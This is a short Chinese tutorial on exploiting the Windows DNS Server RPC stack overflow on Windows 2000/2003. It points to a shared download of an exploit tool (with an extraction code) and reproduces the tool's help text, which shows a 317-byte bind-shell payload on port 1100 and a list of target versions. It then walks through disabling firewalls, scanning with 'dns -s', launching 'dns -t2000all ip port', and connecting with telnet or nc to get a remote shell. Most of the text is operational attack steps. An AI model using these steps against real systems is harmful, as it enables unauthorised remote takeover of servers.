DNS 解析中的漏洞可能允许远程代码执行。
Microsoft Windows 是微软发布的非常流行的操作系统。
Microsoft Windows DNS 服务器的 RPC 接口在处理畸形请求时存在栈溢出漏洞,远程
攻击者可能利用此漏洞获取服务器的管理权限。
如果远程攻击者能够向有漏洞的系统发送特制的 RPC 报文的话,就可以触发这个溢
出,导致以 DNS 服务的安全环境执行任意指令
dns溢出工具
提取码:yo0i
使用时候在cmd里cd到目录下面,然后输入
dns
就可以看到帮助
[.] - UnQuoteIt 006 RC1 - ENJOY - DRIVE WITH CAUTION- Anti-dep version
[*] - bind shell payload selected (317 bytes) port:1100 addr:0.0.0.0
[.] - dns options host [port]
example: dns -t2000all 1.2.3.4 1030
Use -s to scan for the target's port: dns -s 1.2.3.4
[.] - List of known targets:
name : description
2000all : Windows 2000 +SP4
2003eng : EN Windows 2003 Std Ed +SP1
2003chs : CN Windows 2003 Std Ed +SP1
2003cht : TW Windows 2003 Std Ed +SP1
2003jpn : JP Windows 2003 Std Ed +SP1
2003kor : KR Windows 2003 Std Ed +SP1
首先,关闭主机的专用防火墙,把虚拟机的windows切换为桥接模式,虚拟机也关闭专用防火墙,然后互相ping发现可以ping通
并且windows要先安装dns服务器
win10里可以这样安装
设置->应用->应用和功能->可选应用找到
dns并且安装,安装后在cmd里输入dnscmd如果可以看到有帮助就说明成功了
版本比较老了,都是老的漏洞,我就实验不了了,大家有条件的话可以自己实验
大致的流程是这样的
dns -s ip地址
探测开放的端口
dns -t2000all ip 端口
dns加上漏洞加上ip加上端口进行攻击
当利用工具提示溢出成功以后,就可以利用 telnet 命令或程序 nc 连接存在漏洞的服务器中对应的 端口,比如
telnet ip 端口
就可以得到远程主机的 shell。